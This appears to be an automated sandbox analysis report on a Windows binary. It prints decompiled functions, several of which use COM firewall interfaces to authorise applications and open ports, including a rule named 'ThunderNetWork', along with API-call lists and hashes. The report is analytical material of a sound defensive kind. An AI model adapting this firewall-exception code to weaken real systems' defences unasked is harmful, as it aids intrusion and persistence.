                                                                                                                                                • Opcode ID: 77543c66596f5b4a03e87d75bfb9b8cb90f07e5a86634bee95de258958a053d1
                                                                                                                                                • Instruction ID: 90ffb7d9d07d8225db437a54555a3528ebe084c2fe268de1a5391f7cafc8063b
                                                                                                                                                • Opcode Fuzzy Hash: 77543c66596f5b4a03e87d75bfb9b8cb90f07e5a86634bee95de258958a053d1
                                                                                                                                                • Instruction Fuzzy Hash: F051E575A0121DAFCB00DFE8C8899AEBBB9EF4C710B144895F602EB251DB75A945CB60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                			E00BF323D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                				struct HINSTANCE__* _t23;
                                                                                                                                                				intOrPtr _t28;
                                                                                                                                                				intOrPtr _t32;
                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                				void* _t47;
                                                                                                                                                
                                                                                                                                                				_t35 = __ebx;
                                                                                                                                                				_push(0xc);
                                                                                                                                                				_push(0xbfdd18);
                                                                                                                                                				E00BF3F70(__ebx, __edi, __esi);
                                                                                                                                                				_t45 = L"KERNEL32.DLL";
                                                                                                                                                				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                                                                                                                                                				if(_t23 == 0) {
                                                                                                                                                					_t23 = E00BF2003(_t45);
                                                                                                                                                				}
                                                                                                                                                				 *(_t47 - 0x1c) = _t23;
                                                                                                                                                				_t46 =  *((intOrPtr*)(_t47 + 8));
                                                                                                                                                				 *((intOrPtr*)(_t46 + 0x5c)) = 0xbfc870;
                                                                                                                                                				 *((intOrPtr*)(_t46 + 0x14)) = 1;
                                                                                                                                                				if(_t23 != 0) {
                                                                                                                                                					_t35 = GetProcAddress;
                                                                                                                                                					 *((intOrPtr*)(_t46 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                                                                                                                                                					 *((intOrPtr*)(_t46 + 0x1fc)) = GetProcAddress( *(_t47 - 0x1c), "DecodePointer");
                                                                                                                                                				}
                                                                                                                                                				 *((intOrPtr*)(_t46 + 0x70)) = 1;
                                                                                                                                                				 *((char*)(_t46 + 0xc8)) = 0x43;
                                                                                                                                                				 *((char*)(_t46 + 0x14b)) = 0x43;
                                                                                                                                                				 *(_t46 + 0x68) = 0xbff010;
                                                                                                                                                				E00BF3C3D(_t35, 0xd);
                                                                                                                                                				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
                                                                                                                                                				InterlockedIncrement( *(_t46 + 0x68));
                                                                                                                                                				 *(_t47 - 4) = 0xfffffffe;
                                                                                                                                                				E00BF3312();
                                                                                                                                                				E00BF3C3D(_t35, 0xc);
                                                                                                                                                				 *(_t47 - 4) = 1;
                                                                                                                                                				_t28 =  *((intOrPtr*)(_t47 + 0xc));
                                                                                                                                                				 *((intOrPtr*)(_t46 + 0x6c)) = _t28;
                                                                                                                                                				if(_t28 == 0) {
                                                                                                                                                					_t32 =  *0xbff618; // 0xbff540
                                                                                                                                                					 *((intOrPtr*)(_t46 + 0x6c)) = _t32;
                                                                                                                                                				}
                                                                                                                                                				E00BF2EFA( *((intOrPtr*)(_t46 + 0x6c)));
                                                                                                                                                				 *(_t47 - 4) = 0xfffffffe;
                                                                                                                                                				return E00BF3FB5(E00BF331B());
                                                                                                                                                			}

                                                                                                                                                0x00bf323d
                                                                                                                                                0x00bf323d
                                                                                                                                                0x00bf323f
                                                                                                                                                0x00bf3244
                                                                                                                                                0x00bf3249
                                                                                                                                                0x00bf324f
                                                                                                                                                0x00bf3257
                                                                                                                                                0x00bf325a
                                                                                                                                                0x00bf325f
                                                                                                                                                0x00bf3260
                                                                                                                                                0x00bf3263
                                                                                                                                                0x00bf3266
0x00bf3270
0x00bf3275
0x00bf327d
0x00bf3285
0x00bf3295
0x00bf3295
0x00bf329b
0x00bf329e
0x00bf32a5
0x00bf32ac
0x00bf32b5
0x00bf32bb
0x00bf32c2
0x00bf32c8
0x00bf32cf
0x00bf32d6
0x00bf32dc
0x00bf32df
0x00bf32e2
0x00bf32e7
0x00bf32e9
0x00bf32ee
0x00bf32ee
0x00bf32f4
0x00bf32fa
0x00bf330b

APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,00BFDD18,0000000C,00BF3378,00000000,00000000,?,00000000,?,00BF90BC,00000000,00010000,00030000,?,00BF84B4), ref: 00BF324F
• __crt_waiting_on_module_handle.LIBCMT ref: 00BF325A
  • Part of subcall function 00BF2003: Sleep.KERNEL32(000003E8,00000000,?,00BF31A0,KERNEL32.DLL,?,00BF31EC,?,00000000,?,00BF90BC,00000000,00010000,00030000,?,00BF84B4), ref: 00BF200F
  • Part of subcall function 00BF2003: GetModuleHandleW.KERNEL32(00000000,?,00BF31A0,KERNEL32.DLL,?,00BF31EC,?,00000000,?,00BF90BC,00000000,00010000,00030000,?,00BF84B4), ref: 00BF2018
• GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00BF3283
• GetProcAddress.KERNEL32(?,DecodePointer), ref: 00BF3293
• __lock.LIBCMT ref: 00BF32B5
• InterlockedIncrement.KERNEL32(?), ref: 00BF32C2
• __lock.LIBCMT ref: 00BF32D6
• ___addlocaleref.LIBCMT ref: 00BF32F4
Strings
Memory Dump Source
• Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
Similarity
• API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
• String ID: DecodePointer$EncodePointer$KERNEL32.DLL
• API String ID: 1028249917-2843748187
• Opcode ID: 812a9910cb5db97eab8bcd199025d34cf760a4d5648d51cd21a626c599e12ae7
• Instruction ID: 4fedf68be2d6dd6e88068dbfb92a24b4b91fa2c40b2fa9fa7df84ba0018fa39a
• Opcode Fuzzy Hash: 812a9910cb5db97eab8bcd199025d34cf760a4d5648d51cd21a626c599e12ae7
• Instruction Fuzzy Hash: 2311D27190070DDAD720EF79D901B7ABBE0EF00714F104499E6A9E32A1CF74AA88CF54
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 81%
E00BF1191(void* __eax, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
	void* _v8;
	signed int _v12;
	void* _v16;
	void* _v20;
	intOrPtr _v24;
	char _v28;
	char _v32;
	intOrPtr _v36;
	intOrPtr _v40;
	signed int _v44;
	void* __edi;
	void* __esi;
	intOrPtr _t67;
	intOrPtr* _t71;
	intOrPtr* _t72;
	intOrPtr* _t73;
	intOrPtr _t80;
	intOrPtr* _t83;
	intOrPtr* _t85;
	char* _t87;
	intOrPtr* _t88;
	intOrPtr* _t90;
	intOrPtr* _t92;
	intOrPtr* _t94;
	intOrPtr* _t96;
	intOrPtr* _t98;
	intOrPtr* _t100;
	intOrPtr* _t102;
	intOrPtr* _t104;
	intOrPtr* _t106;
	intOrPtr* _t108;
	char* _t110;
	void* _t134;
	intOrPtr _t135;
	intOrPtr _t138;

	_t131 = __edx;
	_t134 = __eax;
	_v44 = 0;
	_t110 = 0x80004005;
	_v20 = 0;
	_v16 = 0;
	_v8 = 0;
	_v12 = 0;
	_v24 = E00BF80F0(__edx, _a4);
	_t67 = E00BF80F0(__edx, "ThunderNetWork");
	_v36 = _t67;
	_v28 = 0x100;
	__imp__#2(L"LAN");
	_v40 = _t67;
	E00BF80F0(__edx, _a8);
	_v32 = 0;
	if(E00BF1071(_t134,  &_v28,  &_v32) == 0) {
		_t135 = _v44;
	} else {
		_t80 = E00BF80F0(_t131, E00BF1C70(_t134, ":") + 1);
		_t138 = _t80;
		__imp__CoInitializeEx(0, 2);
		_t135 = _t80;
		if(_t135 == 0x80010106 || _t135 >= 0) {
			_t110 = E00BF1058( &_v20,  &_v20);
			if(_t110 >= 0) {
				_t83 = _v20;
				_t110 =  *((intOrPtr*)( *_t83 + 0x48))(_t83,  &_v16);
				if(_t110 >= 0) {
					_t85 = _v20;
					_t110 =  *((intOrPtr*)( *_t85 + 0x1c))(_t85,  &_v12);
					if(_t110 >= 0) {
						if((_v12 & 0x00000004) != 0 && _v12 != 4) {
							_v12 = _v12 ^ 0x00000004;
						}
						_t87 =  &_v8;
						__imp__CoCreateInstance(0xbfdb2c, 0, 1, 0xbfdb3c, _t87);
						_t110 = _t87;
						if(_t110 >= 0) {
							_t88 = _v16;
							 *((intOrPtr*)( *_t88 + 0x24))(_t88, _v24);
							_t90 = _v8;
							 *((intOrPtr*)( *_t90 + 0x20))(_t90, _v24);
							_t92 = _v8;
							 *((intOrPtr*)( *_t92 + 0x28))(_t92, _v36);
							_t94 = _v8;
							 *((intOrPtr*)( *_t94 + 0x40))(_t94, _v28);
							_t96 = _v8;
							 *((intOrPtr*)( *_t96 + 0x98))(_t96, _v12);
							_t98 = _v8;
							 *((intOrPtr*)( *_t98 + 0xa8))(_t98, 1);
							_t100 = _v8;
							 *((intOrPtr*)( *_t100 + 0x88))(_t100, 0xffffffff);
							_t102 = _v8;
							 *((intOrPtr*)( *_t102 + 0x80))(_t102, _v40);
							_t104 = _v8;
							 *((intOrPtr*)( *_t104 + 0x48))(_t104, _t138);
							_t106 = _v8;
							 *((intOrPtr*)( *_t106 + 0x98))(_t106, 6);
							_t108 = _v16;
							_t110 =  *((intOrPtr*)( *_t108 + 0x20))(_t108, _v8);
						}
					}
				}
			}
		}
	}
	_t71 = _v8;
	if(_t71 != 0) {
		 *((intOrPtr*)( *_t71 + 8))(_t71);
	}
	_t72 = _v16;
	if(_t72 != 0) {
		 *((intOrPtr*)( *_t72 + 8))(_t72);
	}
	_t73 = _v20;
	if(_t73 != 0) {
		 *((intOrPtr*)( *_t73 + 8))(_t73);
	}
	if(_t135 >= 0) {
		__imp__CoUninitialize();
	}
	return _t110;
}
0x00bf1191
0x00bf119f
0x00bf11a1
0x00bf11a4
0x00bf11a9
0x00bf11ac
0x00bf11af
0x00bf11b2
0x00bf11bf
0x00bf11c2
0x00bf11cc
0x00bf11cf
0x00bf11d6
0x00bf11df
0x00bf11e2
0x00bf11ea
0x00bf11f9
0x00bf1337
0x00bf11ff
0x00bf120e
0x00bf1217
0x00bf1219
0x00bf121f
0x00bf1227
0x00bf123a
0x00bf123f
0x00bf1245
0x00bf1252
0x00bf1256
0x00bf125c
0x00bf1269
0x00bf126d
0x00bf1277
0x00bf127f
                                                                                                                                                0x00bf127f
                                                                                                                                                0x00bf1283
                                                                                                                                                0x00bf1295
                                                                                                                                                0x00bf129b
                                                                                                                                                0x00bf129f
                                                                                                                                                0x00bf12a5
                                                                                                                                                0x00bf12ae
                                                                                                                                                0x00bf12b1
                                                                                                                                                0x00bf12ba
                                                                                                                                                0x00bf12bd
                                                                                                                                                0x00bf12c6
                                                                                                                                                0x00bf12c9
                                                                                                                                                0x00bf12d2
                                                                                                                                                0x00bf12d5
                                                                                                                                                0x00bf12de
                                                                                                                                                0x00bf12e4
                                                                                                                                                0x00bf12ec
                                                                                                                                                0x00bf12f2
                                                                                                                                                0x00bf12fa
                                                                                                                                                0x00bf1300
                                                                                                                                                0x00bf1309
                                                                                                                                                0x00bf130f
                                                                                                                                                0x00bf1316
                                                                                                                                                0x00bf1319
                                                                                                                                                0x00bf1321
                                                                                                                                                0x00bf1327
                                                                                                                                                0x00bf1333
                                                                                                                                                0x00bf1333
                                                                                                                                                0x00bf129f
                                                                                                                                                0x00bf126d
                                                                                                                                                0x00bf1256
                                                                                                                                                0x00bf123f
                                                                                                                                                0x00bf1227
                                                                                                                                                0x00bf133a
                                                                                                                                                0x00bf133f
                                                                                                                                                0x00bf1344
                                                                                                                                                0x00bf1344
                                                                                                                                                0x00bf1347
                                                                                                                                                0x00bf134c
                                                                                                                                                0x00bf1351
                                                                                                                                                0x00bf1351
                                                                                                                                                0x00bf1354
                                                                                                                                                0x00bf1359
                                                                                                                                                0x00bf135e
                                                                                                                                                0x00bf135e
                                                                                                                                                0x00bf1363
                                                                                                                                                0x00bf1365
                                                                                                                                                0x00bf1365
                                                                                                                                                0x00bf1371

                                                                                                                                                APIs
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF11B5
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF11C2
                                                                                                                                                  • Part of subcall function 00BF80F0: lstrlenA.KERNEL32(?,F1C81C65,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF8137
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF814D
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF815C
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00BF1112,00000000), ref: 00BF81EB
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,000000FE,?,00BF1112,00000000), ref: 00BF8206
                                                                                                                                                  • Part of subcall function 00BF80F0: SysAllocString.OLEAUT32(00000000), ref: 00BF8221
                                                                                                                                                • SysAllocString.OLEAUT32(LAN), ref: 00BF11D6
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF11E2
                                                                                                                                                  • Part of subcall function 00BF80F0: _malloc.LIBCMT ref: 00BF81A1
                                                                                                                                                  • Part of subcall function 00BF1071: __wcstoui64.LIBCMT ref: 00BF10DB
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF120E
                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000002,00000001,?), ref: 00BF1219
                                                                                                                                                • CoCreateInstance.OLE32(00BFDB2C,00000000,00000001,00BFDB3C,?), ref: 00BF1295
                                                                                                                                                • CoUninitialize.OLE32(?), ref: 00BF1365
                                                                                                                                                Strings
                                                                                                                                                 Memory Dump Source
                                                                                                                                                 • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                 • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$Convert_com_util::$AllocByteCharErrorLastMultiWide$CreateInitializeInstanceUninitialize__wcstoui64_malloclstrlen
                                                                                                                                                • String ID: LAN$ThunderNetWork
                                                                                                                                                • API String ID: 1199507461-1899760959
                                                                                                                                                • Opcode ID: c7eaaf2697e9910cceaaf239652397b7458c4c8506b9a4b49e4ed8200f78513c
                                                                                                                                                • Instruction ID: a4d4fe96d0d6048c593d48a3122316a0646b83e3cdf96b2f7dfa494535805e62
                                                                                                                                                • Opcode Fuzzy Hash: c7eaaf2697e9910cceaaf239652397b7458c4c8506b9a4b49e4ed8200f78513c
                                                                                                                                                • Instruction Fuzzy Hash: D9611E75A00209EFCB00DFE4C888AAE7BF9FF49314F104899FA05EB251DB759945CB64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 53%
                                                                                                                                                			E00BF1567(char* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                				signed int _v12;
                                                                                                                                                				char _v28;
                                                                                                                                                				void* _v32;
                                                                                                                                                				void* _v36;
                                                                                                                                                				void* _v40;
                                                                                                                                                				void* _v44;
                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                				void* __ebx;
                                                                                                                                                				void* __edi;
                                                                                                                                                				void* __esi;
                                                                                                                                                				signed int _t34;
                                                                                                                                                				void* _t38;
                                                                                                                                                				char* _t39;
                                                                                                                                                				intOrPtr* _t40;
                                                                                                                                                				intOrPtr* _t41;
                                                                                                                                                				intOrPtr* _t42;
                                                                                                                                                				intOrPtr* _t43;
                                                                                                                                                				char* _t51;
                                                                                                                                                				intOrPtr* _t52;
                                                                                                                                                				char* _t53;
                                                                                                                                                				intOrPtr* _t54;
                                                                                                                                                				char* _t55;
                                                                                                                                                				char* _t58;
                                                                                                                                                				intOrPtr* _t59;
                                                                                                                                                				char* _t60;
                                                                                                                                                				intOrPtr* _t75;
                                                                                                                                                				signed int _t78;
                                                                                                                                                
                                                                                                                                                				_t74 = __edx;
                                                                                                                                                				_t34 =  *0xbff008; // 0xf1c81c65
                                                                                                                                                				_v12 = _t34 ^ _t78;
                                                                                                                                                				_v48 = _a4;
                                                                                                                                                				__imp__CoInitialize(0);
                                                                                                                                                				_v44 = 0;
                                                                                                                                                				_v36 = 0;
                                                                                                                                                				_v40 = 0;
                                                                                                                                                				_v32 = 0;
                                                                                                                                                				_t38 = E00BF80F0(__edx, "HNetCfg.FwMgr");
                                                                                                                                                				_t75 = __imp__CLSIDFromProgID;
                                                                                                                                                				_t39 =  *_t75(_t38,  &_v28);
                                                                                                                                                				_t76 = _t39;
                                                                                                                                                				if(_t39 == 0) {
                                                                                                                                                					_t51 =  &_v28;
                                                                                                                                                					__imp__CoCreateInstance(_t51, 0, 5, 0xbfc17c,  &_v44);
                                                                                                                                                					_t76 = _t51;
                                                                                                                                                					if(_t51 >= 0) {
                                                                                                                                                						_t52 = _v44;
                                                                                                                                                						_t74 =  &_v36;
                                                                                                                                                						_t53 =  *((intOrPtr*)( *_t52 + 0x1c))(_t52,  &_v36);
                                                                                                                                                						_t76 = _t53;
                                                                                                                                                						if(_t53 >= 0) {
                                                                                                                                                							_t54 = _v36;
                                                                                                                                                							_t74 =  &_v40;
                                                                                                                                                							_t55 =  *((intOrPtr*)( *_t54 + 0x1c))(_t54,  &_v40);
                                                                                                                                                							_t76 = _t55;
                                                                                                                                                							if(_t55 >= 0) {
                                                                                                                                                								_t58 =  *_t75(E00BF80F0( &_v40, "HNetCfg.FwAuthorizedApplication"),  &_v28);
                                                                                                                                                								_t76 = _t58;
                                                                                                                                                								if(_t58 >= 0) {
                                                                                                                                                									_t59 = _v40;
                                                                                                                                                									_t74 =  &_v32;
                                                                                                                                                									_t60 =  *((intOrPtr*)( *_t59 + 0x50))(_t59,  &_v32);
                                                                                                                                                									_t76 = _t60;
                                                                                                                                                									if(_t60 >= 0) {
                                                                                                                                                										_t76 =  *((intOrPtr*)( *_v32 + 0x24))(_v32, E00BF80F0( &_v32, _v48));
                                                                                                                                                									}
                                                                                                                                                								}
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				_t40 = _v32;
                                                                                                                                                				if(_t40 != 0) {
                                                                                                                                                					 *((intOrPtr*)( *_t40 + 8))(_t40);
                                                                                                                                                				}
                                                                                                                                                				_t41 = _v40;
                                                                                                                                                				if(_t41 != 0) {
                                                                                                                                                					 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                                				}
                                                                                                                                                				_t42 = _v36;
                                                                                                                                                				if(_t42 != 0) {
                                                                                                                                                					 *((intOrPtr*)( *_t42 + 8))(_t42);
                                                                                                                                                				}
                                                                                                                                                				_t43 = _v44;
                                                                                                                                                				if(_t43 != 0) {
                                                                                                                                                					 *((intOrPtr*)( *_t43 + 8))(_t43);
                                                                                                                                                				}
                                                                                                                                                				__imp__CoUninitialize();
                                                                                                                                                				return E00BF1C57(_t76, 0, _v12 ^ _t78, _t74, _t75, _t76);
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00BF1583
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF159E
                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00BF15AA
                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,00BFC17C,?), ref: 00BF15C6
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF1601
                                                                                                                                                  • Part of subcall function 00BF80F0: lstrlenA.KERNEL32(?,F1C81C65,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF8137
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF814D
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF815C
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00BF1112,00000000), ref: 00BF81EB
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,000000FE,?,00BF1112,00000000), ref: 00BF8206
                                                                                                                                                  • Part of subcall function 00BF80F0: SysAllocString.OLEAUT32(00000000), ref: 00BF8221
                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00BF1607
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF162A
                                                                                                                                                  • Part of subcall function 00BF80F0: _malloc.LIBCMT ref: 00BF81A1
                                                                                                                                                • CoUninitialize.OLE32 ref: 00BF166C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$Convert_com_util::$ByteCharErrorFromLastMultiProgWide$AllocCreateInitializeInstanceUninitialize_malloclstrlen
                                                                                                                                                • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                • API String ID: 4188526640-1951265404
                                                                                                                                                • Opcode ID: 5d13dfd9d7aab98dd388a7d56e4ddc4e6f51ebdf652a4ff2f79528e3e1c85647
                                                                                                                                                • Instruction ID: c3458ee0ff3ba32c44062dbe79f0dfd250964247d971d4e1089d11030f0e069f
                                                                                                                                                • Opcode Fuzzy Hash: 5d13dfd9d7aab98dd388a7d56e4ddc4e6f51ebdf652a4ff2f79528e3e1c85647
                                                                                                                                                • Instruction Fuzzy Hash: 68410171D0021DAFCB10EFA9C8888FEB7F9EF48310B5849A9E601F7251DA359C45CB60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 54%
                                                                                                                                                			E00BF1683(char* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                				signed int _v12;
                                                                                                                                                				char _v28;
                                                                                                                                                				void* _v32;
                                                                                                                                                				void* _v36;
                                                                                                                                                				void* _v40;
                                                                                                                                                				void* _v44;
                                                                                                                                                				char _v48;
                                                                                                                                                				char _v52;
                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                				void* __ebx;
                                                                                                                                                				void* __edi;
                                                                                                                                                				void* __esi;
                                                                                                                                                				signed int _t39;
                                                                                                                                                				void* _t43;
                                                                                                                                                				char* _t44;
                                                                                                                                                				intOrPtr* _t45;
                                                                                                                                                				intOrPtr* _t46;
                                                                                                                                                				intOrPtr* _t47;
                                                                                                                                                				intOrPtr* _t48;
                                                                                                                                                				char* _t56;
                                                                                                                                                				intOrPtr* _t57;
                                                                                                                                                				char* _t58;
                                                                                                                                                				intOrPtr* _t59;
                                                                                                                                                				char* _t60;
                                                                                                                                                				char* _t63;
                                                                                                                                                				intOrPtr* _t64;
                                                                                                                                                				char* _t65;
                                                                                                                                                				intOrPtr* _t68;
                                                                                                                                                				char _t83;
                                                                                                                                                				signed int _t86;
                                                                                                                                                
                                                                                                                                                				_t82 = __edx;
                                                                                                                                                				_t39 =  *0xbff008; // 0xf1c81c65
                                                                                                                                                				_v12 = _t39 ^ _t86;
                                                                                                                                                				_t83 = 0;
                                                                                                                                                				_v56 = _a4;
                                                                                                                                                				__imp__CoInitialize(0);
                                                                                                                                                				_v32 = 0;
                                                                                                                                                				_v44 = 0;
                                                                                                                                                				_v40 = 0;
                                                                                                                                                				_v36 = 0;
                                                                                                                                                				_t43 = E00BF80F0(__edx, "HNetCfg.FwMgr");
                                                                                                                                                				_t85 = __imp__CLSIDFromProgID;
                                                                                                                                                				_t44 =  *_t85(_t43,  &_v28);
                                                                                                                                                				_t70 = _t44;
                                                                                                                                                				if(_t44 == 0) {
                                                                                                                                                					_t56 =  &_v28;
                                                                                                                                                					__imp__CoCreateInstance(_t56, 0, 5, 0xbfc17c,  &_v32);
                                                                                                                                                					_t70 = _t56;
                                                                                                                                                					if(_t56 >= 0) {
                                                                                                                                                						_t57 = _v32;
                                                                                                                                                						_t82 =  &_v44;
                                                                                                                                                						_t58 =  *((intOrPtr*)( *_t57 + 0x1c))(_t57,  &_v44);
                                                                                                                                                						_t70 = _t58;
                                                                                                                                                						if(_t58 >= 0) {
                                                                                                                                                							_t59 = _v44;
                                                                                                                                                							_t82 =  &_v40;
                                                                                                                                                							_t60 =  *((intOrPtr*)( *_t59 + 0x1c))(_t59,  &_v40);
                                                                                                                                                							_t70 = _t60;
                                                                                                                                                							if(_t60 >= 0) {
                                                                                                                                                								_t63 =  *_t85(E00BF80F0( &_v40, "HNetCfg.FwAuthorizedApplication"),  &_v28);
                                                                                                                                                								_t70 = _t63;
                                                                                                                                                								if(_t63 >= 0) {
                                                                                                                                                									_t64 = _v40;
                                                                                                                                                									_t82 =  &_v36;
                                                                                                                                                									_t65 =  *((intOrPtr*)( *_t64 + 0x48))(_t64,  &_v36);
                                                                                                                                                									_t70 = _t65;
                                                                                                                                                									if(_t65 >= 0) {
                                                                                                                                                										_v52 = 0;
                                                                                                                                                										_t85 =  &_v48;
                                                                                                                                                										_v48 = 0x100;
                                                                                                                                                										if(E00BF1071(_v56,  &_v48,  &_v52) != 0) {
                                                                                                                                                											_t68 = _v36;
                                                                                                                                                											_t70 =  *((intOrPtr*)( *_t68 + 0x24))(_t68, _v52, _v48);
                                                                                                                                                										}
                                                                                                                                                										_t83 = 0;
                                                                                                                                                									}
                                                                                                                                                								}
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				_t45 = _v36;
                                                                                                                                                				if(_t45 != _t83) {
                                                                                                                                                					 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                                				}
                                                                                                                                                				_t46 = _v40;
                                                                                                                                                				if(_t46 != _t83) {
                                                                                                                                                					 *((intOrPtr*)( *_t46 + 8))(_t46);
                                                                                                                                                				}
                                                                                                                                                				_t47 = _v44;
                                                                                                                                                				if(_t47 != _t83) {
                                                                                                                                                					 *((intOrPtr*)( *_t47 + 8))(_t47);
                                                                                                                                                				}
                                                                                                                                                				_t48 = _v32;
                                                                                                                                                				if(_t48 != _t83) {
                                                                                                                                                					 *((intOrPtr*)( *_t48 + 8))(_t48);
                                                                                                                                                				}
                                                                                                                                                				__imp__CoUninitialize();
                                                                                                                                                				return E00BF1C57(_t70, _t70, _v12 ^ _t86, _t82, _t83, _t85);
			}

                                                                                                                                                APIs
                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00BF169F
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF16BA
                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00BF16C6
                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,00BFC17C,?), ref: 00BF16E2
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF1721
                                                                                                                                                  • Part of subcall function 00BF80F0: lstrlenA.KERNEL32(?,F1C81C65,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF8137
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF814D
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF815C
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00BF1112,00000000), ref: 00BF81EB
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,000000FE,?,00BF1112,00000000), ref: 00BF8206
                                                                                                                                                  • Part of subcall function 00BF80F0: SysAllocString.OLEAUT32(00000000), ref: 00BF8221
                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00BF1727
                                                                                                                                                  • Part of subcall function 00BF1071: __wcstoui64.LIBCMT ref: 00BF10DB
                                                                                                                                                • CoUninitialize.OLE32 ref: 00BF17A7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
